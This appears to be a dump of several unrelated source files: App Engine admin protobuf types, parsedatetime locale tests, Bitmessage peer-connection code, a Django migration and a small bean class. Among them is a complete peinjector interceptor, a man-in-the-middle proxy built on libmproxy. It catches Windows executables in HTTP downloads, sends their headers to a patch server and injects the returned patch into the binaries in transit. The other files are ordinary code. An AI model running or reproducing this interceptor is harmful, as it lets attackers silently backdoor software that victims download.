Endpoints also has a rollout strategy called
``RolloutStrategy.MANAGED``. When using this, Endpoints
fetches the latest configuration and does not need the
configuration ID. In this case, ``config_id`` must be
omitted.
rollout_strategy (google.cloud.appengine_admin_v1.types.EndpointsApiService.RolloutStrategy):
Endpoints rollout strategy. If ``FIXED``, ``config_id`` must
be specified. If ``MANAGED``, ``config_id`` must be omitted.
disable_trace_sampling (bool):
Enable or disable trace sampling. By default,
this is set to false for enabled.
"""
class RolloutStrategy(proto.Enum):
r"""Available rollout strategies."""
UNSPECIFIED_ROLLOUT_STRATEGY = 0
FIXED = 1
MANAGED = 2
name = proto.Field(
proto.STRING,
number=1,
)
config_id = proto.Field(
proto.STRING,
number=2,
)
rollout_strategy = proto.Field(
proto.ENUM,
number=3,
enum=RolloutStrategy,
)
disable_trace_sampling = proto.Field(
proto.BOOL,
number=4,
)
class AutomaticScaling(proto.Message):
r"""Automatic scaling is based on request rate, response
latencies, and other application metrics.
Attributes:
cool_down_period (google.protobuf.duration_pb2.Duration):
The time period that the
`Autoscaler <https://cloud.google.com/compute/docs/autoscaler/>`__
should wait before it starts collecting information from a
new instance. This prevents the autoscaler from collecting
information when the instance is initializing, during which
the collected usage would not be reliable. Only applicable
in the App Engine flexible environment.
cpu_utilization (google.cloud.appengine_admin_v1.types.CpuUtilization):
Target scaling by CPU usage.
max_concurrent_requests (int):
Number of concurrent requests an automatic
scaling instance can accept before the scheduler
spawns a new instance.
Defaults to a runtime-specific value.
max_idle_instances (int):
Maximum number of idle instances that should
be maintained for this version.
max_total_instances (int):
Maximum number of instances that should be
started to handle requests for this version.
max_pending_latency (google.protobuf.duration_pb2.Duration):
Maximum amount of time that a request should
wait in the pending queue before starting a new
instance to handle it.
min_idle_instances (int):
Minimum number of idle instances that should
be maintained for this version. Only applicable
for the default version of a service.
min_total_instances (int):
Minimum number of running instances that
should be maintained for this version.
min_pending_latency (google.protobuf.duration_pb2.Duration):
Minimum amount of time a request should wait
in the pending queue before starting a new
instance to handle it.
request_utilization (google.cloud.appengine_admin_v1.types.RequestUtilization):
Target scaling by request utilization.
disk_utilization (google.cloud.appengine_admin_v1.types.DiskUtilization):
Target scaling by disk usage.
network_utilization (google.cloud.appengine_admin_v1.types.NetworkUtilization):
Target scaling by network usage.
standard_scheduler_settings (google.cloud.appengine_admin_v1.types.StandardSchedulerSettings):
Scheduler settings for standard environment.
"""
cool_down_period = proto.Field(
proto.MESSAGE,
number=1,
message=duration_pb2.Duration,
)
cpu_utilization = proto.Field(
proto.MESSAGE,
number=2,
message='CpuUtilization',
)
max_concurrent_requests = proto.Field(
proto.INT32,
number=3,
)
max_idle_instances = proto.Field(
proto.INT32,
number=4,
)
max_total_instances = proto.Field(
proto.INT32,
number=5,
)
max_pending_latency = proto.Field(
proto.MESSAGE,
number=6,
message=duration_pb2.Duration,
)
min_idle_instances = proto.Field(
proto.INT32,
number=7,
)
min_total_instances = proto.Field(
proto.INT32,
number=8,
)
min_pending_latency = proto.Field(
proto.MESSAGE,
number=9,
message=duration_pb2.Duration,
)
request_utilization = proto.Field(
proto.MESSAGE,
number=10,
message='RequestUtilization',
)
disk_utilization = proto.Field(
proto.MESSAGE,
number=11,
message='DiskUtilization',
)
network_utilization = proto.Field(
proto.MESSAGE,
number=12,
message='NetworkUtilization',
)
standard_scheduler_settings = proto.Field(
proto.MESSAGE,
number=20,
message='StandardSchedulerSettings',
)
class BasicScaling(proto.Message):
r"""A service with basic scaling will create an instance when the
application receives a request. The instance will be turned down
when the app becomes idle. Basic scaling is ideal for work that
is intermittent or driven by user activity.
Attributes:
idle_timeout (google.protobuf.duration_pb2.Duration):
Duration of time after the last request that
an instance must wait before the instance is
shut down.
max_instances (int):
Maximum number of instances to create for
this version.
"""
idle_timeout = proto.Field(
proto.MESSAGE,
number=1,
message=duration_pb2.Duration,
)
max_instances = proto.Field(
proto.INT32,
number=2,
)
class ManualScaling(proto.Message):
r"""A service with manual scaling runs continuously, allowing you
to perform complex initialization and rely on the state of its
memory over time.
Attributes:
instances (int):
Number of instances to assign to the service at the start.
This number can later be altered by using the `Modules
API <https://cloud.google.com/appengine/docs/python/modules/functions>`__
``set_num_instances()`` function.
"""
instances = proto.Field(
proto.INT32,
number=1,
)
class CpuUtilization(proto.Message):
r"""Target scaling by CPU usage.
Attributes:
aggregation_window_length (google.protobuf.duration_pb2.Duration):
Period of time over which CPU utilization is
calculated.
target_utilization (float):
Target CPU utilization ratio to maintain when
scaling. Must be between 0 and 1.
"""
aggregation_window_length = proto.Field(
proto.MESSAGE,
number=1,
message=duration_pb2.Duration,
)
target_utilization = proto.Field(
proto.DOUBLE,
number=2,
)
class RequestUtilization(proto.Message):
r"""Target scaling by request utilization.
Only applicable in the App Engine flexible environment.
Attributes:
target_request_count_per_second (int):
Target requests per second.
target_concurrent_requests (int):
Target number of concurrent requests.
"""
target_request_count_per_second = proto.Field(
proto.INT32,
number=1,
)
target_concurrent_requests = proto.Field(
proto.INT32,
number=2,
)
class DiskUtilization(proto.Message):
r"""Target scaling by disk usage.
Only applicable in the App Engine flexible environment.
Attributes:
target_write_bytes_per_second (int):
Target bytes written per second.
target_write_ops_per_second (int):
Target ops written per second.
target_read_bytes_per_second (int):
Target bytes read per second.
target_read_ops_per_second (int):
            Target ops read per second.
"""
target_write_bytes_per_second = proto.Field(
proto.INT32,
number=14,
)
target_write_ops_per_second = proto.Field(
proto.INT32,
number=15,
)
target_read_bytes_per_second = proto.Field(
proto.INT32,
number=16,
)
target_read_ops_per_second = proto.Field(
proto.INT32,
number=17,
)
class NetworkUtilization(proto.Message):
r"""Target scaling by network usage.
Only applicable in the App Engine flexible environment.
Attributes:
target_sent_bytes_per_second (int):
Target bytes sent per second.
target_sent_packets_per_second (int):
Target packets sent per second.
target_received_bytes_per_second (int):
Target bytes received per second.
target_received_packets_per_second (int):
Target packets received per second.
"""
target_sent_bytes_per_second = proto.Field(
proto.INT32,
number=1,
)
target_sent_packets_per_second = proto.Field(
proto.INT32,
number=11,
)
target_received_bytes_per_second = proto.Field(
proto.INT32,
number=12,
)
target_received_packets_per_second = proto.Field(
proto.INT32,
number=13,
)
class StandardSchedulerSettings(proto.Message):
r"""Scheduler settings for standard environment.
Attributes:
target_cpu_utilization (float):
Target CPU utilization ratio to maintain when
scaling.
target_throughput_utilization (float):
Target throughput utilization ratio to
maintain when scaling
min_instances (int):
Minimum number of instances to run for this version. Set to
zero to disable ``min_instances`` configuration.
max_instances (int):
Maximum number of instances to run for this version. Set to
zero to disable ``max_instances`` configuration.
"""
target_cpu_utilization = proto.Field(
proto.DOUBLE,
number=1,
)
target_throughput_utilization = proto.Field(
proto.DOUBLE,
number=2,
)
min_instances = proto.Field(
proto.INT32,
number=3,
)
max_instances = proto.Field(
proto.INT32,
number=4,
)
class Network(proto.Message):
r"""Extra network settings.
Only applicable in the App Engine flexible environment.
Attributes:
forwarded_ports (Sequence[str]):
List of ports, or port pairs, to forward from
the virtual machine to the application
container. Only applicable in the App Engine
flexible environment.
instance_tag (str):
Tag to apply to the instance during creation.
Only applicable in the App Engine flexible
environment.
name (str):
Google Compute Engine network where the virtual machines are
created. Specify the short name, not the resource path.
Defaults to ``default``.
subnetwork_name (str):
Google Cloud Platform sub-network where the virtual machines
are created. Specify the short name, not the resource path.
If a subnetwork name is specified, a network name will also
be required unless it is for the default network.
- If the network that the instance is being created in is a
Legacy network, then the IP address is allocated from the
IPv4Range.
- If the network that the instance is being created in is
an auto Subnet Mode Network, then only network name
should be specified (not the subnetwork_name) and the IP
address is created from the IPCidrRange of the subnetwork
that exists in that zone for that network.
- If the network that the instance is being created in is a
custom Subnet Mode Network, then the subnetwork_name must
be specified and the IP address is created from the
IPCidrRange of the subnetwork.
If specified, the subnetwork must exist in the same region
as the App Engine flexible environment application.
session_affinity (bool):
Enable session affinity.
Only applicable in the App Engine flexible
environment.
"""
forwarded_ports = proto.RepeatedField(
proto.STRING,
number=1,
)
instance_tag = proto.Field(
proto.STRING,
number=2,
)
name = proto.Field(
proto.STRING,
number=3,
)
subnetwork_name = proto.Field(
proto.STRING,
number=4,
)
session_affinity = proto.Field(
proto.BOOL,
number=5,
)
class Volume(proto.Message):
r"""Volumes mounted within the app container.
Only applicable in the App Engine flexible environment.
Attributes:
name (str):
Unique name for the volume.
volume_type (str):
Underlying volume type, e.g. 'tmpfs'.
size_gb (float):
Volume size in gigabytes.
"""
name = proto.Field(
proto.STRING,
number=1,
)
volume_type = proto.Field(
proto.STRING,
number=2,
)
size_gb = proto.Field(
proto.DOUBLE,
number=3,
)
class Resources(proto.Message):
r"""Machine resources for a version.
Attributes:
cpu (float):
Number of CPU cores needed.
disk_gb (float):
Disk size (GB) needed.
memory_gb (float):
Memory (GB) needed.
volumes (Sequence[google.cloud.appengine_admin_v1.types.Volume]):
User specified volumes.
kms_key_reference (str):
The name of the encryption key that is stored
in Google Cloud KMS. Only should be used by
Cloud Composer to encrypt the vm disk
"""
cpu = proto.Field(
proto.DOUBLE,
number=1,
)
disk_gb = proto.Field(
proto.DOUBLE,
number=2,
)
memory_gb = proto.Field(
proto.DOUBLE,
number=3,
)
volumes = proto.RepeatedField(
proto.MESSAGE,
number=4,
message='Volume',
)
kms_key_reference = proto.Field(
proto.STRING,
number=5,
)
class VpcAccessConnector(proto.Message):
r"""VPC access connector specification.
Attributes:
name (str):
Full Serverless VPC Access Connector name
e.g. /projects/my-project/locations/us-
central1/connectors/c1.
"""
name = proto.Field(
proto.STRING,
number=1,
)
class Entrypoint(proto.Message):
r"""The entrypoint for the application.
Attributes:
shell (str):
The format should be a shell command that can be fed to
``bash -c``.
"""
shell = proto.Field(
proto.STRING,
number=1,
oneof='command',
)
__all__ = tuple(sorted(__protobuf__.manifest))
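# Illustrative usage sketch (an assumption, not part of the generated module):
# proto-plus messages accept their fields as keyword arguments, e.g.
#
#   from google.cloud.appengine_admin_v1 import types
#   v = types.Version(
#       id='v1',
#       runtime='python39',
#       basic_scaling=types.BasicScaling(max_instances=2),
#   )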
|
idpaterson/parsedatetime | refs/heads/master | tests/TestLocaleBase.py | 1 | # -*- coding: utf-8 -*-
"""
Test parsing of simple date and times using the French locale
Note: requires PyICU
"""
from __future__ import unicode_literals
import sys
import time
import datetime
import pytest
import parsedatetime as pdt
from parsedatetime.pdt_locales import get_icu
from . import utils
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
pdtLocale_fr = get_icu('fr_FR')
pdtLocale_fr.dayOffsets.update({"aujourd'hui": 0, 'demain': 1, 'hier': -1})
@pytest.mark.skipif(not pdtLocale_fr, reason="French Locale not found")
class test(unittest.TestCase):
@utils.assertEqualWithComparator
def assertExpectedResult(self, result, check, **kwargs):
return utils.compareResultByTimeTuplesAndFlags(result, check, **kwargs)
def setUp(self):
self.ptc = pdt.Constants('fr_FR', usePyICU=True)
self.cal = pdt.Calendar(self.ptc)
(self.yr, self.mth, self.dy, self.hr,
self.mn, self.sec, self.wd, self.yd, self.isdst) = time.localtime()
if self.ptc.localeID != 'fr_FR':
raise unittest.SkipTest(
'Locale not set to fr_FR - check if PyICU is installed')
def testTimes(self):
if self.ptc.localeID == 'fr_FR':
start = datetime.datetime(
self.yr, self.mth, self.dy,
self.hr, self.mn, self.sec).timetuple()
target = datetime.datetime(
self.yr, self.mth, self.dy, 23, 0, 0).timetuple()
self.assertExpectedResult(
self.cal.parse('2300', start), (target, 2))
self.assertExpectedResult(
self.cal.parse('23:00', start), (target, 2))
target = datetime.datetime(
self.yr, self.mth, self.dy, 11, 0, 0).timetuple()
self.assertExpectedResult(
self.cal.parse('1100', start), (target, 2))
self.assertExpectedResult(
self.cal.parse('11:00', start), (target, 2))
target = datetime.datetime(
self.yr, self.mth, self.dy, 7, 30, 0).timetuple()
self.assertExpectedResult(
self.cal.parse('730', start), (target, 2))
self.assertExpectedResult(
self.cal.parse('0730', start), (target, 2))
target = datetime.datetime(
self.yr, self.mth, self.dy, 17, 30, 0).timetuple()
self.assertExpectedResult(
self.cal.parse('1730', start), (target, 2))
self.assertExpectedResult(
self.cal.parse('173000', start), (target, 2))
def testDates(self):
if self.ptc.localeID == 'fr_FR':
start = datetime.datetime(
self.yr, self.mth, self.dy,
self.hr, self.mn, self.sec).timetuple()
target = datetime.datetime(
2006, 8, 25, self.hr, self.mn, self.sec).timetuple()
self.assertExpectedResult(
self.cal.parse('25/08/2006', start), (target, 1))
self.assertExpectedResult(
self.cal.parse('25/8/06', start), (target, 1))
self.assertExpectedResult(
self.cal.parse('août 25, 2006', start), (target, 1))
self.assertExpectedResult(
self.cal.parse('août 25 2006', start), (target, 1))
if self.mth > 8 or (self.mth == 8 and self.dy > 25):
target = datetime.datetime(
self.yr + 1, 8, 25, self.hr, self.mn, self.sec).timetuple()
else:
target = datetime.datetime(
self.yr, 8, 25, self.hr, self.mn, self.sec).timetuple()
self.assertExpectedResult(
self.cal.parse('25/8', start), (target, 1))
self.assertExpectedResult(
self.cal.parse('25/08', start), (target, 1))
def testWeekDays(self):
if self.ptc.localeID == 'fr_FR':
start = datetime.datetime(
self.yr, self.mth, self.dy,
self.hr, self.mn, self.sec).timetuple()
o1 = self.ptc.CurrentDOWParseStyle
o2 = self.ptc.DOWParseStyle
# set it up so the current dow returns current day
self.ptc.CurrentDOWParseStyle = True
self.ptc.DOWParseStyle = 1
for i in range(0, 7):
dow = self.ptc.shortWeekdays[i]
result = self.cal.parse(dow, start)
yr, mth, dy, hr, mn, sec, wd, yd, isdst = result[0]
self.assertEqual(wd, i)
self.ptc.CurrentDOWParseStyle = o1
self.ptc.DOWParseStyle = o2
@pytest.mark.skipif(not pdtLocale_fr, reason="French Locale not found")
class TestDayOffsets(test):
# test how Aujourd'hui/Demain/Hier are parsed
def setUp(self):
super(TestDayOffsets, self).setUp()
self.__old_pdtlocale_fr = pdt.pdtLocales.get('fr_FR') # save for later
pdt.pdtLocales['fr_FR'] = pdtLocale_fr # override for the test
self.ptc = pdt.Constants('fr_FR', usePyICU=False)
self.cal = pdt.Calendar(self.ptc)
def test_dayoffsets(self):
start = datetime.datetime(self.yr, self.mth, self.dy, 9)
for date_string, expected_day_offset in [
("Aujourd'hui", 0),
("aujourd'hui", 0),
("Demain", 1),
("demain", 1),
("Hier", -1),
("hier", -1),
("today", 0), # assume default names exist
("tomorrow", 1),
("yesterday", -1),
("au jour de hui", None)]:
got_dt, rc = self.cal.parseDT(date_string, start)
if expected_day_offset is not None:
self.assertEqual(rc, 1)
target = (start + datetime.timedelta(days=expected_day_offset))
self.assertEqual(got_dt, target)
else:
self.assertEqual(rc, 0)
def tearDown(self):
if self.__old_pdtlocale_fr is not None: # restore the locale
pdt.pdtLocales['fr_FR'] = self.__old_pdtlocale_fr
super(TestDayOffsets, self).tearDown()
if __name__ == "__main__":
unittest.main()
|
qbert65536/squall | refs/heads/master | src/test/python/SquallBean.py | 2 |
class SquallBean():
def __init__(self):
        self.id = 0
        # Use a separate attribute so the isDirty() method below is not shadowed.
        self.dirty = False
    def isDirty(self):
        return self.dirty
|
killbug2004/peinjector | refs/heads/master | pe-injector-interceptor/peinjector_interceptor.py | 17 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
Interceptor - reference implementation of a Interceptor based on libmproxy with a connection to a peinjector-server
"""
__author__ = 'W.L.'
from threading import Thread
from libmproxy import controller, proxy
from libmproxy.proxy.server import ProxyServer
from libPePatch import PePatch
import sys
import datetime
import netlib
import socket
import time
import ConfigParser
"""
PE Injector specific part
"""
# Build Payload Modifier
def build_pe_modifier(flow, patch_address, config):
def modify(chunks):
# Maximum PE Header size to expect
# Maximum Patch size to expect
# Connection Timeout
# Access Token
max_header, max_patch, connection_timeout, access_token = config
header = True
patcher = None
position = 0
for prefix, content, suffix in chunks:
# Only do this for 1. chunk, and quick PE check
if header and (content[:2] == 'MZ'):
print("Intercept PE, send header to server (" + str(len(content)) + " bytes)")
# If something goes wrong while network transmission
try:
# Open socket
patch_socket = socket.create_connection(patch_address, connection_timeout)
# Send patch to server
if (patch_socket is not None) and patch_socket.send(access_token + content[:max_header]):
# Receive patch from Server
patch_mem = patch_socket.recv(max_patch)
# Close socket
patch_socket.close()
print("Received patch: " + str(len(patch_mem)) + " bytes")
patcher = PePatch(patch_mem)
if patcher.patch_ok():
print("Patch Ok")
else:
print("Error parsing patch")
patcher = None
except Exception as e:
patcher = None
# Check only 1. chunk for header
header = False
# Apply Patch
if patcher is not None:
content = patcher.apply_patch(content, position)
position += len(content)
yield prefix, content, suffix
return modify
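# Usage note: the callable returned by build_pe_modifier() is assigned to
# msg.response.stream in handle_responseheaders() below, so libmproxy feeds it
# the response chunks. The first chunk's PE header (access token plus up to
# max_header bytes) is sent to the patch server, and the returned patch is
# applied to the streamed content as it passes through.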
"""
libmproxy general part
"""
# Bypass stream data without modifying
def bypass_stream(chunks):
for prefix, content, suffix in chunks:
yield prefix, content, suffix
# Stream Switcher
class StreamLargeBodies(object):
def __init__(self, max_size):
self.max_size = max_size
def run(self, flow, is_request):
r = flow.request if is_request else flow.response
code = flow.response.code if flow.response else None
expected_size = netlib.http.expected_http_body_size(
r.headers, is_request, flow.request.method, code
)
if not (0 <= expected_size <= self.max_size):
r.stream = r.stream or True
# Interception Handler
class InterceptingMaster(controller.Master):
# PE Mime Types
binaryMimeTypes = (['application/octet-stream'], ['application/x-msdownload'], ['application/msdos-windows'],
['application/x-winexe'], ['application/x-msdos-program'], ['binary/octet-stream'],
['application/exe'], ['application/x-exe'], ['application/dos-exe'])
def __init__(self, server, config):
controller.Master.__init__(self, server)
# Address of PE Patch Server
self.pe_server_address = config.get("pe", "pe_server_address")
# Port to PE Patch Server
self.pe_server_port = int(config.get("pe", "pe_server_port"))
# Minimum PE Size
self.pe_minimum_size = int(config.get("pe", "pe_minimum_size"))
self.stream_large_bodies = StreamLargeBodies(self.pe_minimum_size)
# Patch config
byte_token = bytearray.fromhex(config.get("pe", "pe_server_token"))
if (len(byte_token) != 32) or (byte_token[:2] != '\xaa\xaa'):
byte_token = '\xaa\xaa' + 30 * '\x00'
self.pe_modifier_config = (
int(config.get("pe_modifier", "max_header")),
int(config.get("pe_modifier", "max_patch")),
int(config.get("pe_modifier", "connection_timeout")),
byte_token
)
# Run Master
def runner(self):
controller.Master.run(self)
# Run Thread
def run(self):
t = Thread(target=self.runner)
t.daemon = True
t.start()
# Handles Request (modify websites, ... here)
def handle_request(self, msg):
msg.reply()
return msg
# Handles Streaming
def handle_responseheaders(self, msg):
try:
if self.stream_large_bodies:
self.stream_large_bodies.run(msg, False)
if msg.response.stream:
# PE Modifier
if msg.response.headers["Content-Type"] in self.binaryMimeTypes:
msg.response.stream = build_pe_modifier(msg, (self.pe_server_address, self.pe_server_port), self.pe_modifier_config)
# Bypass Stream
else:
msg.response.stream = bypass_stream
except netlib.http.HttpError:
msg.reply(protocol.KILL)
return
msg.reply()
return msg
# Handles 'normal' response content
def handle_response(self, msg):
msg.reply()
return msg
# Checks config and set default params
def check_config(config):
if not config.has_section("proxy"):
config.add_section("proxy")
if not config.has_section("pe"):
config.add_section("pe")
if not config.has_section("pe_modifier"):
config.add_section("pe_modifier")
if not config.has_option("proxy", "port"):
config.set("proxy", "port", "8080")
if not config.has_option("proxy", "cadir"):
config.set("proxy", "cadir", "./ca")
if not config.has_option("proxy", "mode"):
config.set("proxy", "mode", "regular")
if not config.has_option("pe", "pe_server_address"):
config.set("pe", "pe_server_address", "127.0.0.1")
if not config.has_option("pe", "pe_server_port"):
config.set("pe", "pe_server_port", "31337")
if not config.has_option("pe", "pe_server_token"):
config.set("pe", "pe_server_token", "aaaa000000000000000000000000000000000000000000000000000000000000")
if not config.has_option("pe", "pe_minimum_size"):
config.set("pe", "pe_minimum_size", "10240")
if not config.has_option("pe_modifier", "max_header"):
config.set("pe_modifier", "max_header", "4096")
if not config.has_option("pe_modifier", "max_patch"):
config.set("pe_modifier", "max_patch", "16384")
if not config.has_option("pe_modifier", "connection_timeout"):
config.set("pe_modifier", "connection_timeout", "1")
# Main routine
def main(argv):
# read config from ini file, check it and write it back
config_file = "config.ini"
config = ConfigParser.ConfigParser()
config.read(config_file)
# Check config and set default params
check_config(config)
# write config to file
with open(config_file, "wb") as cf:
config.write(cf)
# Configure proxy server
proxy_config = proxy.ProxyConfig(
port=int(config.get("proxy", "port")),
cadir=config.get("proxy", "cadir"),
mode=config.get("proxy", "mode")
)
# Create Server
server = ProxyServer(proxy_config)
# Creater Interceptor
imaster = InterceptingMaster(server, config)
imaster.run()
print "Intercepting Proxy listening on " + str(proxy_config.port) + " in " + str(proxy_config.mode) + " mode "
# Wait till keyboard interrupt
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
print 'KeyboardInterrupt received. Shutting down'
imaster.shutdown()
sys.exit(0)
except Exception as e:
print e
            print 'Exception caught.'
sys.exit(0)
# Call main
if __name__ == '__main__':
    main(sys.argv)
|
Voluntarynet/BitmessageKit | refs/heads/master | BitmessageKit/Vendor/pybitmessage/class_outgoingSynSender.py | 10 | import threading
import time
import random
import shared
import socks
import socket
import sys
import tr
from class_sendDataThread import *
from class_receiveDataThread import *
# For each stream to which we connect, several outgoingSynSender threads
# will exist and will collectively create 8 connections with peers.
class outgoingSynSender(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def setup(self, streamNumber, selfInitiatedConnections):
self.streamNumber = streamNumber
self.selfInitiatedConnections = selfInitiatedConnections
def _getPeer(self):
# If the user has specified a trusted peer then we'll only
# ever connect to that. Otherwise we'll pick a random one from
# the known nodes
shared.knownNodesLock.acquire()
if shared.trustedPeer:
peer = shared.trustedPeer
shared.knownNodes[self.streamNumber][peer] = time.time()
else:
peer, = random.sample(shared.knownNodes[self.streamNumber], 1)
shared.knownNodesLock.release()
return peer
def run(self):
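        # Main thread loop: wait until outgoing connections are allowed, then
        # repeatedly pick a peer we have not tried recently and attempt to
        # connect to it, optionally through a SOCKS4a/SOCKS5 proxy.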
while shared.safeConfigGetBoolean('bitmessagesettings', 'dontconnect'):
time.sleep(2)
while shared.safeConfigGetBoolean('bitmessagesettings', 'sendoutgoingconnections'):
maximumConnections = 1 if shared.trustedPeer else 8 # maximum number of outgoing connections = 8
while len(self.selfInitiatedConnections[self.streamNumber]) >= maximumConnections:
time.sleep(10)
if shared.shutdown:
break
random.seed()
peer = self._getPeer()
shared.alreadyAttemptedConnectionsListLock.acquire()
while peer in shared.alreadyAttemptedConnectionsList or peer.host in shared.connectedHostsList:
shared.alreadyAttemptedConnectionsListLock.release()
# print 'choosing new sample'
random.seed()
peer = self._getPeer()
time.sleep(1)
# Clear out the shared.alreadyAttemptedConnectionsList every half
# hour so that this program will again attempt a connection
# to any nodes, even ones it has already tried.
if (time.time() - shared.alreadyAttemptedConnectionsListResetTime) > 1800:
shared.alreadyAttemptedConnectionsList.clear()
shared.alreadyAttemptedConnectionsListResetTime = int(
time.time())
shared.alreadyAttemptedConnectionsListLock.acquire()
shared.alreadyAttemptedConnectionsList[peer] = 0
shared.alreadyAttemptedConnectionsListLock.release()
if peer.host.find(':') == -1:
address_family = socket.AF_INET
else:
address_family = socket.AF_INET6
try:
sock = socks.socksocket(address_family, socket.SOCK_STREAM)
except:
"""
The line can fail on Windows systems which aren't
                64-bit compatible:
File "C:\Python27\lib\socket.py", line 187, in __init__
_sock = _realsocket(family, type, proto)
error: [Errno 10047] An address incompatible with the requested protocol was used
So let us remove the offending address from our knownNodes file.
"""
shared.knownNodesLock.acquire()
try:
del shared.knownNodes[self.streamNumber][peer]
except:
pass
shared.knownNodesLock.release()
with shared.printLock:
print 'deleting ', peer, 'from shared.knownNodes because it caused a socks.socksocket exception. We must not be 64-bit compatible.'
continue
# This option apparently avoids the TIME_WAIT state so that we
# can rebind faster
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(20)
if shared.config.get('bitmessagesettings', 'socksproxytype') == 'none' and shared.verbose >= 2:
with shared.printLock:
print 'Trying an outgoing connection to', peer
# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
elif shared.config.get('bitmessagesettings', 'socksproxytype') == 'SOCKS4a':
if shared.verbose >= 2:
with shared.printLock:
print '(Using SOCKS4a) Trying an outgoing connection to', peer
proxytype = socks.PROXY_TYPE_SOCKS4
sockshostname = shared.config.get(
'bitmessagesettings', 'sockshostname')
socksport = shared.config.getint(
'bitmessagesettings', 'socksport')
rdns = True # Do domain name lookups through the proxy; though this setting doesn't really matter since we won't be doing any domain name lookups anyway.
if shared.config.getboolean('bitmessagesettings', 'socksauthentication'):
socksusername = shared.config.get(
'bitmessagesettings', 'socksusername')
sockspassword = shared.config.get(
'bitmessagesettings', 'sockspassword')
sock.setproxy(
proxytype, sockshostname, socksport, rdns, socksusername, sockspassword)
else:
sock.setproxy(
proxytype, sockshostname, socksport, rdns)
elif shared.config.get('bitmessagesettings', 'socksproxytype') == 'SOCKS5':
if shared.verbose >= 2:
with shared.printLock:
print '(Using SOCKS5) Trying an outgoing connection to', peer
proxytype = socks.PROXY_TYPE_SOCKS5
sockshostname = shared.config.get(
'bitmessagesettings', 'sockshostname')
socksport = shared.config.getint(
'bitmessagesettings', 'socksport')
rdns = True # Do domain name lookups through the proxy; though this setting doesn't really matter since we won't be doing any domain name lookups anyway.
if shared.config.getboolean('bitmessagesettings', 'socksauthentication'):
socksusername = shared.config.get(
'bitmessagesettings', 'socksusername')
sockspassword = shared.config.get(
'bitmessagesettings', 'sockspassword')
sock.setproxy(
proxytype, sockshostname, socksport, rdns, socksusername, sockspassword)
else:
sock.setproxy(
proxytype, sockshostname, socksport, rdns)
try:
sock.connect((peer.host, peer.port))
rd = receiveDataThread()
rd.daemon = True # close the main program even if there are threads left
                someObjectsOfWhichThisRemoteNodeIsAlreadyAware = {} # This is not necessarily a complete list; we clear it from time to time to save memory.
sendDataThreadQueue = Queue.Queue() # Used to submit information to the send data thread for this connection.
rd.setup(sock,
peer.host,
peer.port,
self.streamNumber,
someObjectsOfWhichThisRemoteNodeIsAlreadyAware,
self.selfInitiatedConnections,
sendDataThreadQueue)
rd.start()
with shared.printLock:
print self, 'connected to', peer, 'during an outgoing attempt.'
sd = sendDataThread(sendDataThreadQueue)
sd.setup(sock, peer.host, peer.port, self.streamNumber,
someObjectsOfWhichThisRemoteNodeIsAlreadyAware)
sd.start()
sd.sendVersionMessage()
except socks.GeneralProxyError as err:
if shared.verbose >= 2:
with shared.printLock:
print 'Could NOT connect to', peer, 'during outgoing attempt.', err
deletedPeer = None
with shared.knownNodesLock:
"""
It is remotely possible that peer is no longer in shared.knownNodes.
This could happen if two outgoingSynSender threads both try to
connect to the same peer, both fail, and then both try to remove
it from shared.knownNodes. This is unlikely because of the
alreadyAttemptedConnectionsList but because we clear that list once
every half hour, it can happen.
"""
if peer in shared.knownNodes[self.streamNumber]:
timeLastSeen = shared.knownNodes[self.streamNumber][peer]
                        if (int(time.time()) - timeLastSeen) > 172800 and len(shared.knownNodes[self.streamNumber]) > 1000: # if this node was last seen more than 48 hours ago and we know more than 1000 hosts, delete it from the shared.knownNodes data structure.
del shared.knownNodes[self.streamNumber][peer]
deletedPeer = peer
if deletedPeer:
with shared.printLock:
print 'deleting', peer, 'from shared.knownNodes because it is more than 48 hours old and we could not connect to it.'
except socks.Socks5AuthError as err:
shared.UISignalQueue.put((
'updateStatusBar', tr.translateText(
"MainWindow", "SOCKS5 Authentication problem: %1").arg(str(err))))
            except socks.Socks5Error as err:
                print 'SOCKS5 error. (It is possible that the server wants authentication.)', str(err)
except socks.Socks4Error as err:
print 'Socks4Error:', err
except socket.error as err:
if shared.config.get('bitmessagesettings', 'socksproxytype')[0:5] == 'SOCKS':
print 'Bitmessage MIGHT be having trouble connecting to the SOCKS server. ' + str(err)
else:
if shared.verbose >= 1:
with shared.printLock:
print 'Could NOT connect to', peer, 'during outgoing attempt.', err
deletedPeer = None
with shared.knownNodesLock:
"""
It is remotely possible that peer is no longer in shared.knownNodes.
This could happen if two outgoingSynSender threads both try to
connect to the same peer, both fail, and then both try to remove
it from shared.knownNodes. This is unlikely because of the
alreadyAttemptedConnectionsList but because we clear that list once
every half hour, it can happen.
"""
if peer in shared.knownNodes[self.streamNumber]:
timeLastSeen = shared.knownNodes[self.streamNumber][peer]
                        if (int(time.time()) - timeLastSeen) > 172800 and len(shared.knownNodes[self.streamNumber]) > 1000: # if this node was last seen more than 48 hours ago and we know more than 1000 hosts, delete it from the shared.knownNodes data structure.
del shared.knownNodes[self.streamNumber][peer]
deletedPeer = peer
if deletedPeer:
with shared.printLock:
print 'deleting', peer, 'from shared.knownNodes because it is more than 48 hours old and we could not connect to it.'
except Exception as err:
sys.stderr.write(
'An exception has occurred in the outgoingSynSender thread that was not caught by other exception types: ')
import traceback
traceback.print_exc()
time.sleep(0.1)
|
adamcharnock/swiftwind | refs/heads/master | swiftwind/costs/migrations/0009_check_disabled_xor_billing_cycle.py | 2 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-10-09 12:14
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('costs', '0008_check_cannot_create_recurred_cost_for_disabled_cost'),
]
operations = [
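        # The forward SQL adds a CHECK constraint: a recurring cost must either be
        # disabled with no initial billing cycle, or enabled with one. The reverse
        # SQL drops the constraint again.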
migrations.RunSQL(
"""
ALTER TABLE costs_recurringcost ADD CONSTRAINT check_disabled_xor_initial_billing_cycle
CHECK (
(disabled AND initial_billing_cycle_id IS NULL)
OR
(NOT disabled AND initial_billing_cycle_id IS NOT NULL)
)
""",
"ALTER TABLE costs_recurringcost DROP CONSTRAINT check_disabled_xor_initial_billing_cycle"
)
]
|
